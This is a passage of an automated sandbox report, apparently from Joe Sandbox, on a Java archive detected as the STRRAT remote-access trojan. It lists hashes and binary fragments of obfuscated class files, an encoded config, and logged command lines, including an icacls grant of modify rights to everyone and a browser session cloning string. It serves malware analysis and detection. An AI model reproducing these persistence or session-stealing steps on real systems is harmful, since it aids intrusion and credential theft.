                        SHA-256:ADA6D904B533CD7E26A7C912ADE7EC75B1226F63ED4D6E64D283F2025131C57F
                        SHA-512:4F599BA5119D7CB317F3F8075983212AA35CE7294B50300195A69D745635591B7A887DE1CCE9EA68DB46EF9B908D8513302907A849F669648066D923CB0D233A
                        Malicious:false
                        Preview:.......4...............................................()V..((LcarLambo/tXuEElkzfqlTWetjTVgwULpwLk;)V...<init>...Code..%LcarLambo/tXuEElkzfqlTWetjTVgwULpwLk;.. carLambo/rEgmEOZGPmyKjwgxifrjbDi..#carLambo/tXuEElkzfqlTWetjTVgwULpwLk...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*.............

                        C:\jar\carLambo\rOfTrNtEMcqMLhfoFhtTPXmOS.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):3791
                        Entropy (8bit):5.956108863850589
                        Encrypted:false
                        SSDEEP:96:IlWpVDXAhm6BZE2bXFB8K5qiIBqH6AmhmaW8A:IQz8P9QiIE6AmhmaW8A
                        MD5:62E9332668273D9C6C33E95D3CC130AA
                        SHA1:5987EE0A7045BF3257793D7374D42424ACF6E61D
                        SHA-256:27635BD38B6E8FDC68DFB38E2624FDFD25462D75CFC555683D2A793CA16416AB
                        SHA-512:FFF7D32801A1165E50D6BC525FDABD23AA303C4830D781DC00F0147C985C073EEB69FF11C6B3DD4FECD6CC9396F0F812C317594BD9F3AEB1A29ACAE2396E4744
                        Malicious:false
                        Preview:.......4.........]..^.._..s..t..u..v..w..x..y..z..{..}...............................................................................................#.I....O.. .P..!.X..".M..$.W..%.G..&.H..&.L..&.N..&.R..&.Y..&.[..'.G..'.K..'.\..(.G..).S..).V..*.J..*.T..*.Z..+.Q..+.U..,.T..|.e..|.q.........m....n....j....r....o....h....r....l....g....f....c....d....a....e....i....k....`....b....b................()I...()Ljava/lang/Object;...()Ljava/lang/String;...()Ljava/util/Iterator;...()Ljava/util/Set;...()V...()Z...()[B..&(ILjava/lang/String;I)Ljava/util/List;..O(Lcom/sun/jna/platform/win32/WinReg$HKEY;Ljava/lang/String;)Ljava/util/TreeMap;...(Ljava/lang/CharSequence;)Z..D(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;..&(Ljava/lang/Object;)Ljava/lang/Object;...(Ljava/lang/Object;)Z..-(Ljava/lang/String;)Ljava/lang/StringBuilder;..9(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;..$(Ljava/util/Set;Ljava/lang/String;)Z...([B)V...([B)[B...10.0...11.0...12.0...14.0...15.0.

                        C:\jar\carLambo\resources\config.txt

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):220
                        Entropy (8bit):5.806563737900548
                        Encrypted:false
                        SSDEEP:3:WpBbvF5BaAcFiH/E/+TO+TA7BGOLt9Lf1tW81X/iQPO4va1TirP/sQ/I1XWdgoBS:cdvF5BLffbOv7XxLkiVvaZ45Q1hos
                        MD5:6DECD93E4BB003A96D152A867D904E97
                        SHA1:24E872B663DF301296C4CDFB8BF42A616C27F913
                        SHA-256:241AB6883F7CCE8A6B932F63239EB705F70EF00B6B833988FB13C2C6702D2B35
                        SHA-512:07C3E7C5825143995537B252CC4D7D3E172DD5BAA455BD5980952927B0BBE76D5D90A804F17BCF594105AFE0FA919C6EE891F4C98BA6559A7B50A1BA14FA591C
                        Malicious:false
                        Preview:AAAAEPlvVrpBpOKMW+3XNgMVLeyIEnyunpPiey4EwGjaLoZm6nZRKnB6kF1FzL+DfbFsc9UUwAfFmCiHte+LRxCksknS/dvYJegG0tOrynnCkYcBD6JlRx3Ba0PgEu9PwSl6G5prswhf5Yr8ZIDsJU5R3K1No0J2oIkH64zY0dj9BRVguJ3yx5ZTkfY4wd1kPZBAK7EvZadrRRLzf7JdIXm4AEU=

                        C:\jar\carLambo\tXuEElkzfqlTWetjTVgwULpwLk.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):6242
                        Entropy (8bit):6.069519566743482
                        Encrypted:false
                        SSDEEP:192:/eWaw0AzJrMhTto9jSPEIb7qTaPEI57vVV:/aUJrMtodHVjQ7
                        MD5:D0EA461CD89FBC991117F598EA004A2F
                        SHA1:BF492721B48BDF6460B2771ED72A5509534BE1C2
                        SHA-256:8E8714BDADB543634771F2A6B65EA75F839C9A7AD2180C51C753E2F276DD046D
                        SHA-512:96CACA2E7FC709B27EAC71AB61BAA1A90DD1C181005FE308B7581584E954C6D5451BB157EA8873DA82F7C0C74C3414D42263B0C9F6F48FB18EE381D1A5AC1F83
                        Malicious:false
                        Preview:.......4.....................................................................................................................@.....r.................!.f...................a....q....a....`..............d....l....o....s....v....z....}....~....b....k.........b....k....p.........v....`....n....|.........`....i.........w....c.........h....j..............`.........`..".u.."....#.m..#.t..#.y..$.e....x....... .g.. .{........................................................................................................................................................................................................................................................()J...()Ljava/lang/Object;...()Ljava/lang/String;...()Ljava/util/Iterator;...()Ljava/util/List;...()V...()Z...()[B...()[Ljava/io/File;...(I)Ljava/nio/ByteBuffer;...(II)Ljava/lang/String;..B(ILjava/security/Key;Ljava/security/spec/AlgorithmParameterSpec;)V..((LcarLambo/tXuEElkzfqlTWetjTVgwULpwLk;)V...(Ljava/io/File;)V...(Ljava/lang/Object;

                        C:\jar\carLambo\tjBwnLxfgUZInqAXXJorajaLymNWI.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):404
                        Entropy (8bit):5.5147793203660225
                        Encrypted:false
                        SSDEEP:6:Fb+s3js/Jq2/s4y1XT2Jq2ciDJq2cJUpFnxaJ2qRPt+NulkXi8BPmlknM50:FbgBy1SCiDxLnxaJtRlnlsLqkM50
                        MD5:B3717A0966B55C963D58164A4552BD5A
                        SHA1:10D338785121EFAAA38F393A3DBD09CE7C192F8E
                        SHA-256:6DE383416A0AB410354A9AF95E4628C74910FDB43916D66071F99DA8E61DB25B
                        SHA-512:C076C579BAF85BA3D4A512A98D1BEDFAFB2B722B86D904C998CCC334EC9A6B74A2EE89FE721F511F43E22BF1DB8552B8B7BEEDE845937674F3836DE17B05EA2A
                        Malicious:false
                        Preview:.......4...............................................()V..)(LcarLambo/hSQNXYaWyFQzecPOHvVddvqXyqC;)V...<init>...Code..&LcarLambo/hSQNXYaWyFQzecPOHvVddvqXyqC;..$carLambo/hSQNXYaWyFQzecPOHvVddvqXyqC..&carLambo/tjBwnLxfgUZInqAXXJorajaLymNWI...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*.............

                        C:\jar\carLambo\toANhLheFpVIBJATjkPJUTCvbMu.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):428
                        Entropy (8bit):5.425016275750154
                        Encrypted:false
                        SSDEEP:12:yC8EiMBMOPy1G/MOp8S0FnxaJb13SRF+8Kjd6VDloFU9d5t:8Iy1GyZQGz+8e0V5vDt
                        MD5:BB44519675953DDC6257E8286E37D132
                        SHA1:E6B07D6A754C2062BD57C9D0883A029DDEC1C519
                        SHA-256:1A3C0CA55754B9FD70CD2590F421A1D4FD2BD02F7A0D4C9E19F6F58F41E66389
                        SHA-512:CF0016463C16B182267736FB9BF646B87AD6FF58E30458024BBFA8CEA70F1CD801E603786F948CA17CE13D9486ACAF858322E1F7AC780C3950C46B6C0F6F1879
                        Malicious:false
                        Preview:.......4............................................................()V..&(Ljava/lang/String;)Ljava/lang/String;...<clinit>...<init>...Code...Ljava/lang/String;..$carLambo/toANhLheFpVIBJATjkPJUTCvbMu...gQEuyVcYntwPXTysEtfquh...getProperty...java/lang/Object...java/lang/System...nnHRYoAONroTDXAkGOnAtRE...os.name...user.name.1................................................*.....................................................

                        C:\jar\carLambo\uBLIKHEHpAoUHpElmhtbDhNa.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):600
                        Entropy (8bit):5.73729789696941
                        Encrypted:false
                        SSDEEP:12:7LjnyMjQBjs/MJavFWDxRJHQjdjojD5tnxaJtRloxhAZKHMZ:7Pn/GDadWDDJwjd0XQHzo8ZIW
                        MD5:E5D40DF25C00E2411F3AA3F4B20D866A
                        SHA1:333744DFEFF8612687722489B894C669A9190E22
                        SHA-256:CECACE8FD41A73BD3F33601324C7E2747B8A2F23643A458B5E6848777D68F216
                        SHA-512:FDEAB4C9638511B5F5F8DD4FFA64C48B63FDB2F02182B89079883621E8701E676C4CC2B9E735E21D4344DF3AFF69161A178E26745B7693874215566AF47DCC96
                        Malicious:false
                        Preview:.......4............................................................()V..$(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;)V..6(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;Ljava/lang/String;)V...<init>..lBrowser session cloning started. This will take a long time to complete..You will be notified when complete....Code..!LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;...carLambo/CHHXGzeSpzwiJOAtZoSZBJ..!carLambo/uBLIKHEHpAoUHpElmhtbDhNa...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...nnHRYoAONroTDXAkGOnAtRE...run.0..........................................*+...*..............................*........*.............

                        C:\jar\carLambo\vDWajJBFzMIEOyWGpkkOlvNI.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):422
                        Entropy (8bit):5.562468134959159
                        Encrypted:false
                        SSDEEP:12:svR2s/ey1+/y/esfrtnxaJtRloplsYuPkM50:SR2sGy1+qWKQHzoL1FM50
                        MD5:F3E135F1910FE1660A03C1590D17E15D
                        SHA1:62B14CE3A6C6DF3AD2794AEEBD950D5FE68AC3C4
                        SHA-256:ABD7011E11296DD0882ED642750D43A05CC6306D3800C4CB3660B741972880E8
                        SHA-512:E030A45482E9C32262A150D8BE837D659BEFB05903DC7FAF1C6305BE5BB0F18C80B9C8E058CC15604E05ADE03B4B20E72C5A6ECBED922CFF217DFBE908BA7734
                        Malicious:false
                        Preview:.......4...............................................()V..((LcarLambo/tXuEElkzfqlTWetjTVgwULpwLk;)V...<init>...Code..%LcarLambo/tXuEElkzfqlTWetjTVgwULpwLk;..#carLambo/tXuEElkzfqlTWetjTVgwULpwLk..!carLambo/vDWajJBFzMIEOyWGpkkOlvNI...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...nnHRYoAONroTDXAkGOnAtRE...run.0..........................................*+...*..............................*.............

                        C:\jar\carLambo\vGKYEHoGOVkVVIDgxIUt.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):487
                        Entropy (8bit):5.664142137945078
                        Encrypted:false
                        SSDEEP:12:HKk2ydhMJy1bdrP6/MORdNdAQQnxaJtRloplPqHujdylVi:x/gy1Jb6LNWQqQHzoLiOhyi
                        MD5:B1FAC1B632BE3E543FB935B9BBCDB476
                        SHA1:58CDBCE2757C3D8686BBCD127AC905AA87ADF0B9
                        SHA-256:10F3EB1AA0D853FF0B55F39E8A76482C7E01D796DEE12F37D863F1E1FDCED250
                        SHA-512:0F8DB0DFDBC2F26677C51E1558688B287A59148A146378C50C53E9BFDF04526AF24420EAA2299CD687FEF3C89078E8CD60E257485DB3E064576454906A37B0C0
                        Malicious:false
                        Preview:.......4.........................................................()V..;(LcarLambo/pOkXJMhVItPChYeMRCPBQRAUzLx;Ljava/lang/String;)V...<init>...Code..&LcarLambo/pOkXJMhVItPChYeMRCPBQRAUzLx;...Ljava/lang/String;..$carLambo/pOkXJMhVItPChYeMRCPBQRAUzLx...carLambo/vGKYEHoGOVkVVIDgxIUt...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...nnHRYoAONroTDXAkGOnAtRE...run.0..................................................*+...*,...*..............................*...*.............

                        C:\jar\carLambo\wvGnyIgrUOTdXfGRPmvbIDXjmea.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1638
                        Entropy (8bit):5.757476052425222
                        Encrypted:false
                        SSDEEP:48:kGQyYNtdzjH4L9kEqlfEQQvz5Dp0M87XMtiv:kGmNtJjhayXE8
                        MD5:964A549172E4957D1DA19F2EE668E316
                        SHA1:9C315B92A8F92E64F1E4BE3E6ADD58955DCFEC73
                        SHA-256:F68D1CEA87F54CF89EBB4B23CA598750F3FAD5F94A6E145987091EB00C6436DE
                        SHA-512:3B5537B1E285008B89A6DBF595FC7B31EE04F748D647473685569ABDBE07BA8B64807FA97EBF18D275ECB563658C65B418B0351B37F8B53350E53335E10717D8
                        Malicious:false
                        Preview:.......4.e..]..d..J..K..L..M..R..S..T..U..V..W..X..Y..Z....(....+....3....4....6....'........./....1....2....'....&....*....,....%....%....)....7....-....0....5..@.;..@.<..@.?..H.B..I.>..N.;..O.D..P.9..Q.=..[.8..[.?..\.:..^.;.._.;.._.F..`.C..a.;..b.E..c.8...()Ljava/lang/String;..!()Ljava/nio/channels/FileChannel;...()Ljava/nio/channels/FileLock;...()V...(Ljava/io/File;)V..&(Ljava/lang/String;)Ljava/lang/String;..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V...<init>...Code..(LcarLambo/DZQmNBgOWWDUGcQCKUlPSbuRpohqT;...Ljava/io/File;...Ljava/io/FileOutputStream;...Ljava/lang/String;...Ljava/nio/channels/FileLock;...StackMapTable...akllnBiTjwPmAwfMbajsTFm...append..&carLambo/DZQmNBgOWWDUGcQCKUlPSbuRpohqT.. carLambo/GYDTPVEwzYqRTvxmvHtRLJG..&carLambo/iytiDwrcScnkWxsldKZwufPjSLiFk..$carLambo/wvGnyIgrUOTdXfGRPmvbIDXjmea...close...gQEuyVcYntwPXTysEtfquh...getChannel...getProperty...java/io/File...java/io/FileOutputStream...java/lang/Exception...java/lang/Object...java

                        C:\jar\carLambo\xjzwOiTLTjfoGTzdLznhC.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):481
                        Entropy (8bit):5.643347396916603
                        Encrypted:false
                        SSDEEP:12:sn61AkdPHTlYlnxaJ8EoRVwOzXpOwlD66W6xPDPAe:+61A6HTlMQSPwuxJ6wxPDH
                        MD5:C8AF181A23986A8149181D97F6B417B5
                        SHA1:8C975DD86A6EDD44379360720CCCC268DFFE0B27
                        SHA-256:80861756465C9CC63A0246744A11BB746F3EAF91AFEFADC1087AF401D7645BE1
                        SHA-512:3BECCD4ECDF479A6BBC14CC5F99E4F188EEDADCB0B87107D38683EF31E1694E89F029F7BD9C6626F81AF03B51A32BD853862C57F9AD02EB96B88B10D5969C099
                        Malicious:false
                        Preview:.......4...................................................................()V...()[I...<clinit>...Code...I...StackMapTable...[I...carLambo/qQnenommQRmzAInlnTAeg...carLambo/xjzwOiTLTjfoGTzdLznhC...gQEuyVcYntwPXTysEtfquh...java/lang/NoSuchFieldError...java/lang/Object...nnHRYoAONroTDXAkGOnAtRE...qvNsplybcQmnatGjnQTThBZ...values$258dc6c5.0...............................l.......2................d.O...W.......d.O...W.......d.O.W..............!.$...%./.0............V....L....J.....

                        Static File Info

                        General

                        File type:Zip archive data, at least v2.0 to extract, compression method=deflate
                        Entropy (8bit):7.914309490947633
                        TrID:
                        • Java Archive (13504/1) 62.80%
                        • ZIP compressed archive (8000/1) 37.20%
                        File name:MVO4879773357878.jar
                        File size:112'050 bytes
                        MD5:ee75fce2158c3587daa560419f122001
                        SHA1:760d09adceeb4903db4130ef0d28654915844d5d
                        SHA256:88a9b4cfac5ba3a433942f8f4e489229f0fd694a7f9a78a8b6ca5cc5dc590e00
                        SHA512:c1a4ce9bf70ced9adee8f2955573e65777bc3e4151dacca076502cbd8cb8af9ceb5735cfed73e2bb9d8617961a3862ef94f440d25ab9f948407705b1a88d4229
                        SSDEEP:3072:QOOwYuveeNu/6Xy8HZknOZ6Xdbx9kkTrxZKXZnmVOEvIT:KwdveeoiXy8Cny6Nbx9nrxZKJtEvS
                        TLSH:63B3CF2EAECFC6B0D04B82728425A167AB5D41B9E143A50F69FD34454E32DBC4B17ACF
                        File Content Preview:PK.........ctX................META-INF/MANIFEST.MF..OK.0....|.9.ab.....Z.d]........4.I....{....s........9...I.h.....g;.E...v...........Vx5..7.x^mJ...N..Z...a..R........RW.5.,.1..;._p%......#\..........3...Wk..^.6s..q...a......ec..X...........Lx3...@Ji.4%?

                        File Icon

                        Icon Hash:d08c8e8ea2868a54

                        Network Behavior

                        No network behavior found

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:13:58:26
                        Start date:29/03/2024
                        Path:C:\Windows\System32\7za.exe
                        Wow64 process (32bit):true
                        Commandline:7za.exe x -y -oC:\jar "C:\Users\user\Desktop\MVO4879773357878.jar"
                        Imagebase:0x500000
                        File size:289'792 bytes
                        MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:1
                        Start time:13:58:26
                        Start date:29/03/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:2
                        Start time:13:58:26
                        Start date:29/03/2024
                        Path:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                        Wow64 process (32bit):true
                        Commandline:java.exe -jar "C:\Users\user\Desktop\MVO4879773357878.jar" carLambo.FirstRun
                        Imagebase:0x680000
                        File size:257'664 bytes
                        MD5 hash:9DAA53BAB2ECB33DC0D9CA51552701FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 00000002.00000002.2872991367.0000000009D69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 00000002.00000002.2872568836.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate
                        Has exited:false

                        General

                        Target ID:3
                        Start time:13:58:26
                        Start date:29/03/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:4
                        Start time:13:58:27
                        Start date:29/03/2024
                        Path:C:\Windows\SysWOW64\icacls.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
                        Imagebase:0xc30000
                        File size:29'696 bytes
                        MD5 hash:2E49585E4E08565F52090B144062F97E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        General

                        Target ID:5
                        Start time:13:58:27
                        Start date:29/03/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Disassembly

                        Reset < >

                          Executed Functions

                          Function 0262D9A5 Relevance: .2, Instructions: 199COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2872371573.0000000002622000.00000040.00000800.00020000.00000000.sdmp, Offset: 02622000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_2622000_java.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e0e9ede5071f18d9340bd43811d63581cd9693c650f13ed1065a9147a4ac40d1
                          • Instruction ID: cfb16e8f682833de726130c34dffcee902e0b6f9b73a2168ed6efa3e4c24ef3d
                          • Opcode Fuzzy Hash: e0e9ede5071f18d9340bd43811d63581cd9693c650f13ed1065a9147a4ac40d1
                          • Instruction Fuzzy Hash: 5781EDB5A04A51DFDB18CF24C4A4BA9FBB1FF49318F08819DC81A5B381CB34A849CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02620672 Relevance: .1, Instructions: 57COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2872371573.0000000002620000.00000040.00000800.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_2620000_java.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7117c26017f97d4b1946e169c98690a4de111ff073a821b597ace0ec01aca623
                          • Instruction ID: de824ebad9404b781b192fc4892b0d016c67e4b947ec9830efdfdb51b80bff94
                          • Opcode Fuzzy Hash: 7117c26017f97d4b1946e169c98690a4de111ff073a821b597ace0ec01aca623
                          • Instruction Fuzzy Hash: 7A118BB2D0063ACFCF18CF48C4855ADB3B0FBA8324B668525DC66A3341D3386924CF81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02620722 Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2872371573.0000000002620000.00000040.00000800.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_2620000_java.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8342b855bb2bee572f7f52d943d69b5e1643ecb8c1815fe220ef75d4dccfc715
                          • Instruction ID: e871a829c41f515765c4cd197c205455bcaf04b770c6bbe05f2a19058bc5cca4
                          • Opcode Fuzzy Hash: 8342b855bb2bee572f7f52d943d69b5e1643ecb8c1815fe220ef75d4dccfc715
                          • Instruction Fuzzy Hash: EEF0157AC00229DBCB14DF48C4400ADF7B1EB54218B2A8496DC2837341D332AD66CF81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02634CCD Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2872371573.0000000002622000.00000040.00000800.00020000.00000000.sdmp, Offset: 02622000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_2622000_java.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: abef7b987eae0ac3115ee0d02a304008604c30ca3cfd01af509c3aa15b997754
                          • Instruction ID: 5cefb26dd61179397e9bdd8d94272851785c05526c1b36ab83825eaeb1455027
                          • Opcode Fuzzy Hash: abef7b987eae0ac3115ee0d02a304008604c30ca3cfd01af509c3aa15b997754
                          • Instruction Fuzzy Hash: A1F0BCB5900A06EBEB258F20C1047EAF7B4BB88704F14420AD42C53310C3787469CBD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02634B78 Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2872371573.0000000002622000.00000040.00000800.00020000.00000000.sdmp, Offset: 02622000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_2622000_java.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ca00cb3d6106003e8b433ff68419599230e6a059902dfd384ca2b40f727c2be5
                          • Instruction ID: ef86db8a4deaf667d75e2a162fa4fc28fb5b7eb2da8145977a3c8975ec00258f
                          • Opcode Fuzzy Hash: ca00cb3d6106003e8b433ff68419599230e6a059902dfd384ca2b40f727c2be5
                          • Instruction Fuzzy Hash: B8F079B6A00A16EBDB258F65C1047DAFBB4BB88718F14821AD82C67350D778B469CBD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02636495 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2872371573.0000000002622000.00000040.00000800.00020000.00000000.sdmp, Offset: 02622000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_2622000_java.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a160ee568ea17c0d51a602067940c352aafec94bc895390fe3db7140dd9d9ba3
                          • Instruction ID: 1ba9a64982845198b79f7c98211a1f70ccdc52afb25f2e6f95741481310c177f
                          • Opcode Fuzzy Hash: a160ee568ea17c0d51a602067940c352aafec94bc895390fe3db7140dd9d9ba3
                          • Instruction Fuzzy Hash: 0CF09BB6A00A16EBDB25CF65C1447CAFBB4BB88718F14421AC42C67350D779B469CFC0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0262DA35 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2872371573.0000000002622000.00000040.00000800.00020000.00000000.sdmp, Offset: 02622000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_2622000_java.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 27a54df9c32f7134db9e95b88bc8a1455ea2eec03a3efca6c579330eb9068a64
                          • Instruction ID: 54925f64e339f2666a804ca8404fadf6d68035972f5d55d5d7b4d67882313c61
                          • Opcode Fuzzy Hash: 27a54df9c32f7134db9e95b88bc8a1455ea2eec03a3efca6c579330eb9068a64
                          • Instruction Fuzzy Hash: 19F0CAB6D00A1AABDB248F65C1047DAFBB4BB88714F18421AC42C63320D378B4A9CFD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 026349AA Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2872371573.0000000002622000.00000040.00000800.00020000.00000000.sdmp, Offset: 02622000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_2622000_java.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 79fe7a36c713918b90ed4075dd9990cd46909e47fef424ae263c1e0b1349f864
                          • Instruction ID: e8b86b1331b0a6ee539f62642ee4ad4411c1dbe150e0e692662f0c76f4dda933
                          • Opcode Fuzzy Hash: 79fe7a36c713918b90ed4075dd9990cd46909e47fef424ae263c1e0b1349f864
                          • Instruction Fuzzy Hash: 1BF0CAB6D00A16ABDB248F61C1047CAFBB4BB88718F14421AC42C67320D378B4A9CFC0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02633C76 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2872371573.0000000002622000.00000040.00000800.00020000.00000000.sdmp, Offset: 02622000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_2622000_java.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1ad9c017ca9a25ea9187570a298cd05b322adfaf6b97c6756ca123bbc4420d89
                          • Instruction ID: fa46b6a260c0bd2ff66d21301061c90206519d32a76476b5da0512d863d200db
                          • Opcode Fuzzy Hash: 1ad9c017ca9a25ea9187570a298cd05b322adfaf6b97c6756ca123bbc4420d89
                          • Instruction Fuzzy Hash: 16F0CAB6D00A1AABDB248FA1C1047CAFBB4BB88714F14421AC42C67320D378B4A9CFC0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0262B4F5 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2872371573.0000000002622000.00000040.00000800.00020000.00000000.sdmp, Offset: 02622000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_2622000_java.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d3a5d33816d0949cbec1b31c29f8331f3c7e6f4a3670d4fe293157bbd4e75dc7
                          • Instruction ID: 9176334e2507db7d4649f432b91273c0125845bb687cfc5bd4f8c8114104f522
                          • Opcode Fuzzy Hash: d3a5d33816d0949cbec1b31c29f8331f3c7e6f4a3670d4fe293157bbd4e75dc7
                          • Instruction Fuzzy Hash: CCF0CAB6D00A16ABDB248F61C1047DAFBB4BB88714F14421AC52C63720C778B4A9CFC0
                          Uniqueness

                          Uniqueness Score: -1.00%

